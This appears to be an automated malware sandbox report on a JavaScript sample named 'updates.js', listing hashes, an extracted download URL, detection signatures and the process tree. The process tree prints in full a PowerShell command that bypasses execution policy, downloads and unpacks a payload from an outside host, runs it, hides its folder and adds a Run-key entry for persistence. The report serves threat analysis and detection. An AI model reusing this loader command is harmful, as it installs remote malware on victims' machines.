Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
17-07-2024 13:18
Static task
static1
Behavioral task
behavioral1
Sample
updates.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
updates.js
Resource
win10v2004-20240709-en
General
-
Target
updates.js
-
Size
7.3MB
-
MD5
917ed9cb792f81537e24395e1505bf6c
-
SHA1
25fec4cba71614d8332cac3f4446fca039d1f33e
-
SHA256
d62447548f057c993c73fece105a22d98d2e2604e4f0cd26bb6821b2686e732f
-
SHA512
e0b907f89db72260dd82346e6a55e71870e57a4654dfbe15670143304016d04d6a581da270c160dc27e70d26b4f8641f3dbf2da87ce9f646741e09a1a17a7921
-
SSDEEP
49152:f7h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQy:y
Malware Config
Extracted
http://luxurycaborental.com/cdn-vs/data.php?12105
http://luxurycaborental.com/cdn-vs/data.php?12105
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2460 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2460 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2460 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2460 2148 wscript.exe 31 PID 2148 wrote to memory of 2460 2148 wscript.exe 31 PID 2148 wrote to memory of 2460 2148 wscript.exe 31
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2460
-